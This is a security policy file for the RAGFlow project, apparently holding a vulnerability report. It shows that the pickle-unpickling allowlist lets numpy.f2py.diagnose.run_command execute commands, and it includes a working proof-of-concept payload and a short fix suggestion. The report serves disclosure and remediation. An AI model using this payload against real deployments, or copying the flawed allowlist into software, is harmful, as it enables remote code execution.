- # Security Policy
-
- ## Supported Versions
-
- Use this section to tell people about which versions of your project are
- currently being supported with security updates.
-
- | Version | Supported |
- | ------- | ------------------ |
- | <=0.7.0 | :white_check_mark: |
-
- ## Reporting a Vulnerability
-
- ### Branch name
-
- main
-
- ### Actual behavior
-
- The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
- The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
-
-
- ### Steps to reproduce
-
-
- **ragflow_patch.py**
-
- ```py
- import builtins
- import io
- import pickle
-
- safe_module = {
- 'numpy',
- 'rag_flow'
- }
-
-
- class RestrictedUnpickler(pickle.Unpickler):
- def find_class(self, module, name):
- import importlib
- if module.split('.')[0] in safe_module:
- _module = importlib.import_module(module)
- return getattr(_module, name)
- # Forbid everything else.
- raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
- (module, name))
-
-
- def restricted_loads(src):
- """Helper function analogous to pickle.loads()."""
- return RestrictedUnpickler(io.BytesIO(src)).load()
- ```
- Then, **PoC.py**
- ```py
- import pickle
- from ragflow_patch import restricted_loads
- class Exploit:
- def __reduce__(self):
- import numpy.f2py.diagnose
- return numpy.f2py.diagnose.run_command, ('whoami', )
-
- Payload=pickle.dumps(Exploit())
- restricted_loads(Payload)
- ```
- **Result**
- 
-
-
- ### Additional information
-
- #### How to prevent?
- Strictly filter the module and name before calling with getattr function.
|